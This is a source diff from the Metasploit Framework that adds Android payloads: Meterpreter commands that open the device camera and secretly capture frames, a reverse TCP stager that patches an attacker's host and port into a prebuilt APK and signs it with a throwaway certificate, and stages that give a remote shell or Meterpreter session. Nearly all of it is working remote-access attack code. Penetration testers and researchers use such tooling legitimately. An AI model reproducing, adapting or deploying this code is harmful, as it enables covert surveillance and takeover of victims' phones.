--- a/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_get_frame_android.java
+++ b/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_get_frame_android.java
@ -0,0 +1,59 @@
+
+package com.metasploit.meterpreter.android;
+
+import android.graphics.PixelFormat;
+import android.hardware.Camera;
+import android.hardware.Camera.Parameters;
+import android.hardware.Camera.PictureCallback;
+import android.util.Log;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+
+public class webcam_get_frame_android extends webcam_audio_record implements Command {
+
+    private static final int TLV_EXTENSIONS = 20000;
+    private static final int TLV_TYPE_WEBCAM_IMAGE = TLVPacket.TLV_META_TYPE_RAW | (TLV_EXTENSIONS + 1);
+    private static final int TLV_TYPE_WEBCAM_QUALITY = TLVPacket.TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 3);
+
+    private byte[] cameraData;
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+
+        int quality = request.getIntValue(TLV_TYPE_WEBCAM_QUALITY);
+                
+        try {
+            if (webcam_start_android.camera == null) {
+                return ERROR_FAILURE;
+            }
+
+            cameraData = null;
+            //Parameters params = webcam_start_android.camera.getParameters();
+            //params.setPictureFormat(PixelFormat.JPEG);
+            //params.set("jpeg-quality", quality);
+            webcam_start_android.camera.takePicture(null, null, new PictureCallback() {
+                @Override
+                public void onPictureTaken(byte[] data, Camera camera) {
+                    cameraData = data;
+                    synchronized (webcam_get_frame_android.this) {
+                    	webcam_get_frame_android.this.notify();
+                    }
+                }
+            });
+            
+            synchronized (this) {
+            	wait(10000);
+            }
+
+            if (cameraData != null) {
+            	response.add(TLV_TYPE_WEBCAM_IMAGE, cameraData);
+            }
+        } catch (Exception e) {
+            Log.e(getClass().getSimpleName(), "webcam error ", e);
+        }
+
+        return ERROR_SUCCESS;
+    }
+}
--- a/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_list_android.java
+++ b/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_list_android.java
@ -0,0 +1,58 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+
+import android.util.Log;
+
+import java.lang.reflect.Field;
+import java.lang.reflect.Method;
+
+public class webcam_list_android extends webcam_audio_record implements Command {
+
+    private static final int TLV_EXTENSIONS = 20000;
+    private static final int TLV_TYPE_WEBCAM_NAME = TLVPacket.TLV_META_TYPE_STRING | (TLV_EXTENSIONS + 4);
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+
+        try {
+            Class<?> cameraClass = Class.forName("android.hardware.Camera");
+            Object cameraInfo = null;
+            Field field = null;
+            int cameraCount = 0;
+            try {
+                Method getNumberOfCamerasMethod = cameraClass.getMethod("getNumberOfCameras");
+                cameraCount = (Integer)getNumberOfCamerasMethod.invoke(null, (Object[])null);
+            } catch (NoSuchMethodException nsme) {
+                response.add(TLV_TYPE_WEBCAM_NAME, "Default Camera"); // Pre 2.2 device
+                return ERROR_SUCCESS;
+            }
+            Class<?> cameraInfoClass = Class.forName("android.hardware.Camera$CameraInfo");
+            if (cameraInfoClass != null) {
+                cameraInfo = cameraInfoClass.newInstance();
+            }
+            if (cameraInfo != null) {
+                field = cameraInfo.getClass().getField("facing");
+            }
+            Method getCameraInfoMethod = cameraClass.getMethod("getCameraInfo", Integer.TYPE, cameraInfoClass);
+            if (getCameraInfoMethod != null && cameraInfoClass != null && field != null) {
+                for (int camIdx = 0; camIdx < cameraCount; camIdx++) {
+                    getCameraInfoMethod.invoke(null, camIdx, cameraInfo);
+                    int facing = field.getInt(cameraInfo);
+                    if (facing == 1) { // Camera.CameraInfo.CAMERA_FACING_FRONT
+                        response.addOverflow(TLV_TYPE_WEBCAM_NAME, "Front Camera");
+                    } else {
+                        response.addOverflow(TLV_TYPE_WEBCAM_NAME, "Back Camera");
+                    }
+                }
+            }
+        } catch (Exception e) {
+            Log.e(getClass().getSimpleName(), "webcam error ", e);
+        }
+
+        return ERROR_SUCCESS;
+    }
+}
--- a/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_start_android.java
+++ b/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_start_android.java
@ -0,0 +1,42 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+
+import android.hardware.Camera;
+import android.util.Log;
+
+import java.lang.reflect.Method;
+
+public class webcam_start_android extends webcam_audio_record implements Command {
+
+    private static final int TLV_EXTENSIONS = 20000;
+    private static final int TLV_TYPE_WEBCAM_INTERFACE_ID = TLVPacket.TLV_META_TYPE_UINT | (TLV_EXTENSIONS + 2);
+
+    public static Camera camera;
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+
+        int camId = request.getIntValue(TLV_TYPE_WEBCAM_INTERFACE_ID);
+                
+        try {
+            Class<?> cameraClass = Class.forName("android.hardware.Camera");
+            Method cameraOpenMethod = cameraClass.getMethod("open", Integer.TYPE);
+            if (cameraOpenMethod != null) {
+                camera = (Camera)cameraOpenMethod.invoke(null, camId - 1);
+            } else {
+                camera = Camera.open();
+            }
+            camera.setPreviewDisplay(null);
+            camera.startPreview();
+
+        } catch (Exception e) {
+            Log.e(getClass().getSimpleName(), "webcam error ", e);
+        }
+
+        return ERROR_SUCCESS;
+    }
+}
--- a/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_stop_android.java
+++ b/external/source/javapayload/androidpayload/library/src/com/metasploit/meterpreter/android/webcam_stop_android.java
@ -0,0 +1,28 @@
+
+package com.metasploit.meterpreter.android;
+
+import com.metasploit.meterpreter.Meterpreter;
+import com.metasploit.meterpreter.TLVPacket;
+import com.metasploit.meterpreter.command.Command;
+import com.metasploit.meterpreter.stdapi.webcam_audio_record;
+
+import android.util.Log;
+
+public class webcam_stop_android extends webcam_audio_record implements Command {
+
+    public int execute(Meterpreter meterpreter, TLVPacket request, TLVPacket response) throws Exception {
+
+        try {
+            if (webcam_start_android.camera != null) {
+                webcam_start_android.camera.stopPreview();
+                webcam_start_android.camera.release();
+                webcam_start_android.camera = null;
+            }
+
+        } catch (Exception e) {
+            Log.e(getClass().getSimpleName(), "webcam error ", e);
+        }
+
+        return ERROR_SUCCESS;
+    }
+}
--- a/external/source/javapayload/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/CommandManager.java
+++ b/external/source/javapayload/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/CommandManager.java
@ -37,9 +37,12 @@ public class CommandManager {
 			apiVersion = ExtensionLoader.V1_6;
 		} catch (Throwable t) {
 		}
-		int vmVersion = System.getProperty("java.version").charAt(2) - '2' + ExtensionLoader.V1_2;
-		if (vmVersion >= ExtensionLoader.V1_2 && vmVersion < apiVersion)
-			apiVersion = vmVersion;
+		String javaversion = System.getProperty("java.version");
+		if (javaversion != null && javaversion.length() > 2) {
+			int vmVersion = javaversion.charAt(2) - '2' + ExtensionLoader.V1_2;
+			if (vmVersion >= ExtensionLoader.V1_2 && vmVersion < apiVersion)
+				apiVersion = vmVersion;
+		}
 		this.javaVersion = apiVersion;

 		// load core commands
--- a/external/source/javapayload/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
+++ b/external/source/javapayload/meterpreter/meterpreter/src/main/java/com/metasploit/meterpreter/Meterpreter.java
@ -32,6 +32,7 @@ public class Meterpreter {

 	private List/* <Channel> */channels = new ArrayList();
 	private final CommandManager commandManager;
+	private final DataInputStream in;
 	private final DataOutputStream out;
 	private final Random rnd = new Random();
 	private final ByteArrayOutputStream errBuffer;
@ -39,6 +40,7 @@ public class Meterpreter {
 	private final boolean loadExtensions;
 	private List/* <byte[]> */tlvQueue = null;

+
 	/**
 	 * Initialize the meterpreter.
 	 * 
@ -53,7 +55,27 @@ public class Meterpreter {
 	 * @throws Exception
 	 */
 	public Meterpreter(DataInputStream in, OutputStream rawOut, boolean loadExtensions, boolean redirectErrors) throws Exception {
+		this(in, rawOut, loadExtensions, redirectErrors, true);
+	}
+
+	/**
+	 * Initialize the meterpreter.
+	 * 
+	 * @param in
+	 *            Input stream to read from
+	 * @param rawOut
+	 *            Output stream to write into
+	 * @param loadExtensions
+	 *            Whether to load (as a {@link ClassLoader} would do) the extension jars; disable this if you want to use your debugger's edit-and-continue feature or if you do not want to update the jars after each build
+	 * @param redirectErrors
+	 *            Whether to redirect errors to the internal error buffer; disable this to see the errors on the victim's standard error stream
+	 * @param beginExecution
+	 *            Whether to begin executing immediately
+	 * @throws Exception
+	 */
+	public Meterpreter(DataInputStream in, OutputStream rawOut, boolean loadExtensions, boolean redirectErrors, boolean beginExecution) throws Exception {
 		this.loadExtensions = loadExtensions;
+		this.in = in;
 		this.out = new DataOutputStream(rawOut);
 		commandManager = new CommandManager();
 		channels.add(null); // main communication channel?
@ -64,6 +86,12 @@ public class Meterpreter {
 			errBuffer = null;
 			err = System.err;
 		}
+		if (beginExecution) {
+			startExecuting();
+		}
+	}
+	
+	public void startExecuting() throws Exception {
 		try {
 			while (true) {
 				int len = in.readInt();
--- a/external/source/javapayload/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_get_processes.java
+++ b/external/source/javapayload/meterpreter/stdapi/src/main/java/com/metasploit/meterpreter/stdapi/stdapi_sys_process_get_processes.java
@ -46,7 +46,7 @@ public class stdapi_sys_process_get_processes implements Command {
 			br.close();
 			proc.waitFor();
 		} else {
-			Process proc = Runtime.getRuntime().exec(new String[] { "/bin/sh", "-c", "ps ax -w -o pid,user,cmd --no-header 2>/dev/null" });
+			Process proc = Runtime.getRuntime().exec(new String[] { "/bin/sh", "-c", "ps ax -w -o pid=,user=,command= 2>/dev/null" });
 			BufferedReader br = new BufferedReader(new InputStreamReader(proc.getInputStream()));
 			String line;
 			while ((line = br.readLine()) != null) {
--- a/external/source/javapayload/pom.xml
+++ b/external/source/javapayload/pom.xml
@ -47,6 +47,21 @@
 		<module>meterpreter</module>
 		<module>version-compatibility-check</module>
 	</modules>
+	<profiles>
+		<profile>
+			<activation>
+				<property>
+					<name>android.sdk.path</name>
+				</property>
+			</activation>
+			<!-- deploy built files to Metasploit data directory -->
+			<id>android</id>
+			<modules>
+				<module>androidpayload/app</module>
+				<module>androidpayload/library</module>
+			</modules>
+		</profile>
+	</profiles>
 	<prerequisites>
 		<maven>3.0</maven>
 	</prerequisites>
--- a/external/source/javapayload/version-compatibility-check/android-api3-scents/android-api3-scents-1.5_r4.signature
+++ b/external/source/javapayload/version-compatibility-check/android-api3-scents/android-api3-scents-1.5_r4.signature
--- a/external/source/javapayload/version-compatibility-check/android-api3-scents/pom.xml
+++ b/external/source/javapayload/version-compatibility-check/android-api3-scents/pom.xml
@ -0,0 +1,81 @@
+<project>
+	<modelVersion>4.0.0</modelVersion>
+	<groupId>com.metasploit</groupId>
+	<artifactId>android-api3-scents</artifactId>
+	<version>1.5_r4</version>
+	<packaging>pom</packaging>
+	<build>
+		<plugins>
+			<plugin>
+				<groupId>org.codehaus.mojo</groupId>
+				<artifactId>build-helper-maven-plugin</artifactId>
+				<version>1.8</version>
+				<executions>
+					<execution>
+						<id>attach-artifacts</id>
+						<phase>package</phase>
+						<goals>
+							<goal>attach-artifact</goal>
+						</goals>
+						<configuration>
+							<artifacts>
+								<artifact>
+									<file>${project.artifactId}-${project.version}.signature</file>
+									<type>signature</type>
+								</artifact>
+							</artifacts>
+						</configuration>
+					</execution>
+				</executions>
+			</plugin>
+		</plugins>
+	</build>
+	<profiles>
+		<profile>
+			<!-- regenerate the .signature file like this: -->
+			<!-- mvn -Dandroid.sdk.path=... -P regenerate package -->
+			<id>regenerate</id>
+			<build>
+				<plugins>
+					<plugin>
+						<groupId>org.codehaus.mojo</groupId>
+						<artifactId>animal-sniffer-maven-plugin</artifactId>
+						<version>1.9</version>
+						<executions>
+							<execution>
+								<id>regenerate</id>
+								<phase>package</phase>
+								<goals>
+									<goal>build</goal>
+								</goals>
+							</execution>
+						</executions>
+						<configuration>
+							<javaHomeClassPath>
+								<javaHomeClassPath>${android.sdk.path}/platforms/android-3/android.jar</javaHomeClassPath>
+							</javaHomeClassPath>
+						</configuration>
+					</plugin>
+					<plugin>
+						<artifactId>maven-antrun-plugin</artifactId>
+						<version>1.7</version>
+						<executions>
+							<execution>
+								<phase>package</phase>
+								<goals>
+									<goal>run</goal>
+								</goals>
+								<configuration>
+									<target>
+										<copy todir="${project.basedir}"
+											file="${project.basedir}/target/${project.artifactId}-${project.version}.signature" />
+									</target>
+								</configuration>
+							</execution>
+						</executions>
+					</plugin>
+				</plugins>
+			</build>
+		</profile>
+	</profiles>
+</project>
--- a/external/source/javapayload/version-compatibility-check/android-api3/pom.xml
+++ b/external/source/javapayload/version-compatibility-check/android-api3/pom.xml
@ -0,0 +1,84 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+	<groupId>com.metasploit</groupId>
+	<artifactId>Metasploit-JavaPayload-Compatibility-android-api3</artifactId>
+	<parent>
+		<groupId>com.metasploit</groupId>
+		<artifactId>Metasploit-JavaPayload-Compatibility-parent</artifactId>
+		<version>1-SNAPSHOT</version>
+	</parent>
+	<packaging>jar</packaging>
+	<name>JavaPayload Compatibility Checks (Android API 3)</name>
+	<url>http://www.metasploit.com/</url>
+	<dependencies>
+		<dependency>
+			<groupId>com.google.android</groupId>
+			<artifactId>android</artifactId>
+			<version>1.5_r4</version>
+		</dependency>
+	</dependencies>
+	<build>
+		<plugins>
+			<plugin>
+				<groupId>org.apache.maven.plugins</groupId>
+				<artifactId>maven-compiler-plugin</artifactId>
+				<version>3.0</version>
+				<configuration>
+					<source>1.5</source>
+					<target>1.5</target>
+				</configuration>
+			</plugin>
+			<plugin>
+				<artifactId>maven-antrun-plugin</artifactId>
+				<version>1.7</version>
+				<executions>
+					<execution>
+						<id>copy-source</id>
+						<phase>generate-sources</phase>
+						<goals>
+							<goal>run</goal>
+						</goals>
+						<configuration>
+							<target>
+								<mkdir dir="${project.basedir}/target/generated-sources/copy/" />
+								<copy todir="${project.basedir}/target/generated-sources/copy">
+									<fileset dir="${project.basedir}/../java16/target/generated-sources/copy">
+										<include name="**/*.java" />
+										<exclude name="**/stdapi_net_config_get_interfaces_V1_6.java" />
+										<exclude name="**/stdapi_fs_stat_V1_6.java" />
+										<exclude name="**/stdapi_ui_desktop_screenshot_V1_4.java" />
+										<exclude name="metasploit/PayloadApplet.java" />
+									</fileset>
+									<fileset dir="${project.basedir}/../../androidpayload/app/src" includes="**/*.java" excludes="**/MainActivity.java" />
+									<fileset dir="${project.basedir}/../../androidpayload/library/src" includes="**/*.java" />
+								</copy>
+							</target>
+						</configuration>
+					</execution>
+				</executions>
+			</plugin>
+			<plugin>
+				<groupId>org.codehaus.mojo</groupId>
+				<artifactId>animal-sniffer-maven-plugin</artifactId>
+				<version>1.9</version>
+				<executions>
+					<execution>
+						<id>verify-java</id>
+						<phase>test</phase>
+						<goals>
+							<goal>check</goal>
+						</goals>
+						<configuration>
+							<signature>
+								<groupId>com.metasploit</groupId>
+								<artifactId>android-api3-scents</artifactId>
+								<version>1.5_r4</version>
+							</signature>
+						</configuration>
+					</execution>
+				</executions>
+			</plugin>
+		</plugins>
+	</build>
+</project>
--- a/external/source/javapayload/version-compatibility-check/pom.xml
+++ b/external/source/javapayload/version-compatibility-check/pom.xml
@ -54,5 +54,7 @@
 		<module>java14</module>
 		<module>java13</module>
 		<module>java12</module>
+		<module>android-api3-scents</module>
+		<module>android-api3</module>
 	</modules>
 </project>
--- a/lib/msf/core/module/platform.rb
+++ b/lib/msf/core/module/platform.rb
@ -331,6 +331,14 @@ class Msf::Module::Platform
 		Alias = "netware"
 	end

+	#
+	# Android
+	#
+	class Android < Msf::Module::Platform
+		Rank = 100
+		Alias = "android"
+	end
+
 	#
 	# Java
 	#
--- a/lib/msf/core/payload.rb
+++ b/lib/msf/core/payload.rb
@ -28,6 +28,7 @@ class Payload < Msf::Module
 	require 'msf/core/payload/windows'
 	require 'msf/core/payload/netware'
 	require 'msf/core/payload/java'
+	require 'msf/core/payload/dalvik'

 	##
 	#
--- a/lib/msf/core/payload/dalvik.rb
+++ b/lib/msf/core/payload/dalvik.rb
@ -0,0 +1,35 @@
+# -*- coding: binary -*-
+require 'msf/core'
+
+module Msf::Payload::Dalvik
+
+	#
+	# Fix the dex header checksum and signature
+	# http://source.android.com/tech/dalvik/dex-format.html
+	#
+	def fix_dex_header(dexfile)
+		dexfile = dexfile.unpack('a8LH40a*')
+		dexfile[2] = Digest::SHA1.hexdigest(dexfile[3])
+		dexfile[1] = Zlib.adler32(dexfile[2..-1].pack('H40a*'))
+		dexfile.pack('a8LH40a*')
+	end
+
+	#
+	# We could compile the .class files with dx here
+	#
+	def generate_stage
+	end
+
+	#
+	# Used by stagers to construct the payload jar file as a String
+	#
+	def generate
+		generate_jar.pack
+	end
+
+	def java_string(str)
+		[str.length].pack("N") + str
+	end
+
+end
+
--- a/lib/rex/constants.rb
+++ b/lib/rex/constants.rb
@ -83,6 +83,7 @@ ARCH_ARMLE  = 'armle'
 ARCH_ARMBE  = 'armbe'
 ARCH_JAVA   = 'java'
 ARCH_RUBY   = 'ruby'
+ARCH_DALVIK = 'dalvik'
 ARCH_TYPES  =
 	[
 		ARCH_X86,
@ -101,7 +102,8 @@ ARCH_TYPES  =
 		ARCH_PHP,
 		ARCH_TTY,
 		ARCH_JAVA,
-		ARCH_RUBY
+		ARCH_RUBY,
+		ARCH_DALVIK
 	]

 ARCH_ALL = ARCH_TYPES
--- a/modules/exploits/multi/handler.rb
+++ b/modules/exploits/multi/handler.rb
@ -32,7 +32,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					'BadChars'    => '',
 					'DisableNops' => true,
 				},
-			'Platform'       => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java','ruby','js','python' ],
+			'Platform'       => [ 'win', 'linux', 'solaris', 'unix', 'osx', 'bsd', 'php', 'java', 'ruby', 'js', 'python', 'android' ],
 			'Arch'           => ARCH_ALL,
 			'Targets'        => [ [ 'Wildcard Target', { } ] ],
 			'DefaultTarget'  => 0
--- a/modules/payloads/stagers/android/reverse_tcp.rb
+++ b/modules/payloads/stagers/android/reverse_tcp.rb
@ -0,0 +1,84 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#	http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+module Metasploit3
+
+	include Msf::Payload::Stager
+	include Msf::Payload::Dalvik
+
+	def initialize(info = {})
+		super(merge_info(info,
+			'Name'			=> 'Dalvik Reverse TCP Stager',
+			'Description'	=> 'Connect back stager',
+			'Author'		=> 'timwr',
+			'License'		=> MSF_LICENSE,
+			'Platform'		=> 'android',
+			'Arch'			=> ARCH_DALVIK,
+			'Handler'		=> Msf::Handler::ReverseTcp,
+			'Stager'		=> {'Payload' => ""}
+		))
+	end
+
+	def string_sub(data, placeholder, input)
+		data.gsub!(placeholder, input + ' ' * (placeholder.length - input.length))
+	end
+
+	def generate_jar(opts={})
+		jar = Rex::Zip::Jar.new
+
+		classes = File.read(File.join(Msf::Config::InstallRoot, 'data', 'android', 'apk', 'classes.dex'), {:mode => 'rb'})
+
+		string_sub(classes, '127.0.0.1                       ', datastore['LHOST'].to_s) if datastore['LHOST']
+		string_sub(classes, '4444                            ', datastore['LPORT'].to_s) if datastore['LPORT']
+		jar.add_file("classes.dex", fix_dex_header(classes))
+
+		files = [
+			[ "AndroidManifest.xml" ],
+			[ "res", "drawable-mdpi", "icon.png" ],
+			[ "res", "layout", "main.xml" ],
+			[ "resources.arsc" ]
+		]
+
+		jar.add_files(files, File.join(Msf::Config.install_root, "data", "android", "apk"))
+		jar.build_manifest
+
+		x509_name = OpenSSL::X509::Name.parse(
+			"C=Unknown/ST=Unknown/L=Unknown/O=Unknown/OU=Unknown/CN=Unknown"
+			)
+		key  = OpenSSL::PKey::RSA.new(1024)
+		cert = OpenSSL::X509::Certificate.new
+		cert.version = 2
+		cert.serial = 1
+		cert.subject = x509_name
+		cert.issuer = x509_name
+		cert.public_key = key.public_key
+
+		# Some time within the last 3 years
+		cert.not_before = Time.now - rand(3600*24*365*3)
+
+		# From http://developer.android.com/tools/publishing/app-signing.html
+		# """
+		# A validity period of more than 25 years is recommended.
+		#
+		# If you plan to publish your application(s) on Google Play, note
+		# that a validity period ending after 22 October 2033 is a
+		# requirement. You can not upload an application if it is signed
+		# with a key whose validity expires before that date.
+		# """
+		cert.not_after = cert.not_before + 3600*24*365*20 # 20 years
+
+		jar.sign(key, cert, [cert])
+
+		jar
+	end
+
+end
--- a/modules/payloads/stages/android/meterpreter.rb
+++ b/modules/payloads/stages/android/meterpreter.rb
@ -0,0 +1,51 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#	http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/payload/dalvik'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/meterpreter_java'
+require 'msf/base/sessions/meterpreter_options'
+
+
+module Metasploit3
+	include Msf::Sessions::MeterpreterOptions
+
+	# The stager should have already included this
+	#include Msf::Payload::Java
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'			=> 'Android Meterpreter',
+			'Description'	=> 'Run a meterpreter server on Android',
+			'Author'		=> [
+					'mihi', # all the hard work
+					'egypt' # msf integration
+				],
+			'Platform'		=> 'android',
+			'Arch'			=> ARCH_DALVIK,
+			'License'		=> MSF_LICENSE,
+			'Session'		=> Msf::Sessions::Meterpreter_Java_Java))
+	end
+
+	#
+	# Override the Payload::Dalvik version so we can load a prebuilt jar to be
+	# used as the final stage
+	#
+	def generate_stage
+		clazz = 'androidpayload.stage.Meterpreter'
+		file = File.join(Msf::Config.data_directory, "android", "metstage.jar")
+		metstage = File.open(file, "rb") {|f| f.read(f.stat.size) }
+
+		file = File.join(Msf::Config.data_directory, "android", "meterpreter.jar")
+		met = File.open(file, "rb") {|f| f.read(f.stat.size) }
+
+		# Name of the class to load from the stage, the actual jar to load
+		# it from, and then finally the meterpreter stage
+		java_string(clazz) + java_string(metstage) + java_string(met)
+	end
+end
--- a/modules/payloads/stages/android/shell.rb
+++ b/modules/payloads/stages/android/shell.rb
@ -0,0 +1,49 @@
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#	http://metasploit.com/
+##
+
+require 'msf/core'
+require 'msf/core/payload/dalvik'
+require 'msf/core/handler/reverse_tcp'
+require 'msf/base/sessions/command_shell'
+require 'msf/base/sessions/command_shell_options'
+
+
+module Metasploit3
+
+	# The stager should have already included this
+	#include Msf::Payload::Java
+	include Msf::Sessions::CommandShellOptions
+
+	def initialize(info = {})
+		super(update_info(info,
+			'Name'			=> 'Command Shell',
+			'Description'	=> 'Spawn a piped command shell (sh)',
+			'Author'		=> [
+					'mihi', # all the hard work
+					'egypt' # msf integration
+				],
+			'Platform'		=> 'android',
+			'Arch'			=> ARCH_DALVIK,
+			'License'		=> MSF_LICENSE,
+			'Session'		=> Msf::Sessions::CommandShell))
+	end
+
+	#
+	# Override the {Payload::Dalvik} version so we can load a prebuilt jar
+	# to be used as the final stage
+	#
+	def generate_stage
+		clazz = 'androidpayload.stage.Shell'
+		file = File.join(Msf::Config.data_directory, "android", "shell.jar")
+		shell_jar = File.open(file, "rb") {|f| f.read(f.stat.size) }
+
+		# Name of the class to load from the stage, and then the actual jar
+		# to load it from
+		java_string(clazz) + java_string(shell_jar)
+	end
+end